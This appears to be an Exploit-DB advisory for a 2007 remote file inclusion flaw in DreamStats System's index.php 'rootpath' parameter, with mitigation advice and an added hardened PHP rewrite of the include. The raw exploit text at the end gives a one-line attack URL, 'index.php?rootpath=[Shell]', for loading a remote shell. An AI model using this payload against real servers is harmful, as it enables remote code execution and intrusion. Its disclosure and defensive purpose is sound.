by: ThE dE@Th
CVSS: 7.5 (HIGH)
Code Execution
CWE: 94
Patch Exists: NO
Platforms Tested:
2007

Code Execution Vulnerability in index.php

The vulnerability allows an attacker to execute arbitrary code on the server through the 'rootpath' parameter of the index.php file. The value is not validated or sanitized before index.php prepends it to the path passed to include(), so an attacker-supplied 'rootpath' decides which file the server loads and runs, allowing remote code execution.

Mitigation:

To mitigate this vulnerability, implement proper input validation and sanitization on the 'rootpath' parameter. Additionally, ensure that the server is running the latest patched version of the software.
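
A hardened form of the include from index.php, as an added example that is not DreamStats code: the base directory is a server-side constant instead of a request-influenced `$rootpath`, and the included file must pass an allow-list and a `realpath()` containment check. `APP_ROOT`, `safe_template_path()` and the allow-list are hypothetical names, and `$slots` is a constructed stand-in value.

```php
<?php
// Added example, not DreamStats code. Hardened form of:
//   if (!$slots) {include($rootpath . 'html/serveroffline.php');exit;}
// Related php.ini hardening: allow_url_include = Off (and register_globals
// off on PHP versions that still have it).

// The base directory is fixed server-side and never read from the request.
define('APP_ROOT', __DIR__ . DIRECTORY_SEPARATOR);   // hypothetical constant

// Hypothetical helper: return the absolute path of an allow-listed template
// inside APP_ROOT/html, or null if the name or resolved path is rejected.
function safe_template_path(string $name, string $root = APP_ROOT): ?string
{
    $allowed = ['serveroffline.php'];                // hypothetical allow-list
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    $base = realpath($root . 'html');
    $path = realpath($root . 'html' . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;                                 // missing dir or file
    }
    // Containment check: the resolved file must sit under the html directory,
    // which also defeats symlinks and ../ sequences.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// The application no longer reads rootpath from requests, so a request
// that carries it is refused outright.
if (isset($_GET['rootpath']) || isset($_POST['rootpath']) || isset($_COOKIE['rootpath'])) {
    http_response_code(400);
    exit;
}

$slots = 0;                                          // constructed stand-in value
if (!$slots) {
    $file = safe_template_path('serveroffline.php');
    if ($file === null) {
        http_response_code(500);
        exit;
    }
    include $file;
    exit;
}
```
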
Source

Exploit-DB raw data:

ConTact Me:-wWw.Asb-May.Net
ScRiPt:-http://callofduty.filefront.com/file/DreamStats_System;54520
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs TeAm}>>
******************************************************************************
index.php:-
if (!$slots) {include($rootpath . 'html/serveroffline.php');exit;}
********************************************************************************
ExPlOiT:-http://www.Site.com/PaTh/index.php?rootpath=[Shell]
********************************************************************************

# milw0rm.com [2007-02-02]